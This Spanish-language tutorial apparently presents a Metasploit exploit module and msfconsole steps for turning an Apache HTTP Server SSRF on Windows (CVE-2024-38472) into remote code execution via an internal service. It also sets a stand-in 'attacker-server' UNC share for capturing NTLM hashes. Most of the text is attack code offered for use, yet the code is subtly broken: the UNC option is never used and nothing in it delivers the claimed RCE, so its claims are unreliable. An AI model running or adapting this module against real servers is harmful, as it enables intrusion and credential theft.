
Módulo de Metasploit que explota SSRF del servidor HTTP Apache (CVE-2024-38472) en Windows para alcanzar servicios internos y lograr ejecución remota de código.
Crear un módulo de Metasploit para ejecución remota de código (RCE) aprovechando la vulnerabilidad SSRF (CVE-2024-38472) en Apache HTTP Server en Windows es un desafío porque SSRF en sí mismo no resulta directamente en RCE. Sin embargo, SSRF puede ser a menudo un paso hacia lograr RCE, especialmente si se puede utilizar para interactuar con servicios internos o desencadenar una vulnerabilidad secundaria.
Para lograr RCE mediante SSRF, generalmente necesitamos:
Para este ejemplo, supongamos que podemos desencadenar un servicio secundario internamente que acepta solicitudes HTTP y puede ser engañado para ejecutar código arbitrario (como un servidor Jenkins u otro servicio con una API expuesta).
Crearemos un módulo de Metasploit que intente lograr RCE explotando SSRF para interactuar con un servicio interno. En este caso, simularemos un servidor Jenkins interno con una consola de scripts expuesta que podamos abusar para RCE.
Guarda el siguiente código como apache_unc_ssrf_rce.rb en el directorio modules/exploits/multi/http de tu instalación de Metasploit Framework.
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'Apache HTTP Server Windows UNC SSRF to RCE',
'Description' => %q{
This module exploits a Server-Side Request Forgery (SSRF) vulnerability in Apache HTTP Server on Windows,
which can potentially be leveraged to achieve Remote Code Execution (RCE) by interacting with internal
services like Jenkins.
},
'Author' =>
[
'Your Name' # Your name or handle
],
'License' => MSF_LICENSE,
'References' =>
[
['CVE', '2024-38472'],
['URL', 'https://example.com/advisory'] # Replace with an advisory link if available
],
'DisclosureDate' => 'Aug 03 2024',
'Platform' => ['win'],
'Arch' => [ARCH_CMD],
'Targets' => [
['Windows', { 'Arch' => ARCH_CMD, 'Platform' => 'win' }]
],
'DefaultTarget' => 0
))
register_options(
[
Opt::RHOSTS,
Opt::RPORT(80),
OptString.new('TARGETURI', [ true, "The base path to the vulnerable application", '/']),
OptString.new('UNC_SERVER', [ true, "UNC path of the malicious server to receive NTLM hashes", '\\\\attacker-server\\share']),
OptString.new('INTERNAL_SERVICE', [ true, "Internal service URL to exploit for RCE", 'http://internal-service/script']),
OptString.new('CMD', [ true, "Command to execute", 'calc.exe'])
])
end
def check
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path),
})
if res && res.headers['Server'] && res.headers['Server'].include?('Apache')
return Exploit::CheckCode::Appears
end
Exploit::CheckCode::Safe
end
def exploit
ssrf_payload = {
'method' => 'GET',
'uri' => normalize_uri(target_uri.path),
'version' => '1.1',
'headers' => {
'Host' => datastore['RHOSTS'],
'Content-Type' => 'application/x-www-form-urlencoded'
},
'data' => "url=#{datastore['INTERNAL_SERVICE']}?script=#{Rex::Text.uri_encode(datastore['CMD'])}"
}
begin
print_status("Sending SSRF request to #{datastore['RHOSTS']}:#{datastore['RPORT']}#{target_uri.path}")
res = send_request_cgi(ssrf_payload)
if res && res.code == 200
print_good("Successfully triggered the internal service")
else
print_error("Failed to trigger the internal service: #{res.inspect}")
end
rescue ::Rex::ConnectionError => e
print_error("Connection failed: #{e.message}")
rescue ::Interrupt
print_status("User interrupted the module execution")
rescue ::Exception => e
print_error("An unexpected error occurred: #{e.message}")
end
end
end
Guardar el Módulo:
Guarda el módulo como apache_unc_ssrf_rce.rb en el directorio modules/exploits/multi/http de tu instalación de Metasploit Framework.
/path/to/metasploit-framework/modules/exploits/multi/http/apache_unc_ssrf_rce.rb
Cargar Metasploit: Inicia Metasploit Framework abriendo una terminal y ejecutando:
msfconsole
Usar el Nuevo Módulo: En la consola de Metasploit, carga el nuevo módulo de exploit usando el siguiente comando:
use exploit/multi/http/apache_unc_ssrf_rce
Configurar y Ejecutar:
Establece las opciones necesarias, como RHOSTS, RPORT, TARGETURI, UNC_SERVER, INTERNAL_SERVICE y CMD. Luego ejecuta el módulo.
msf6 > use exploit/multi/http/apache_unc_ssrf_rce
msf6 exploit(multi/http/apache_unc_ssrf_rce) > set RHOSTS target_ip
RHOSTS => target_ip
msf6 exploit(multi/http/apache_unc_ssrf_rce) > set RPORT 80
RPORT => 80
msf6 exploit(multi/http/apache_unc_ssrf_rce) > set TARGETURI /
TARGETURI => /
msf6 exploit(multi/http/apache_unc_ssrf_rce) > set UNC_SERVER \\\\attacker-server\\share
UNC_SERVER => \\attacker-server\share
msf6 exploit(multi/http/apache_unc_ssrf_rce) > set INTERNAL_SERVICE http://internal-service/script
INTERNAL_SERVICE => http://internal-service/script
msf6 exploit(multi/http/apache_unc_ssrf_rce) > set CMD calc.exe
CMD => calc.exe
msf6 exploit(multi/http/apache_unc_ssrf_rce) > run
Este módulo mejorado de Metasploit envía una solicitud manipulada al servidor Apache HTTP vulnerable en Windows, intentando desencadenar la vulnerabilidad SSRF y aprovecharla para lograr RCE al interactuar con un servicio interno. Ajusta el payload y el módulo según sea necesario en función de la naturaleza específica de la vulnerabilidad y el entorno objetivo.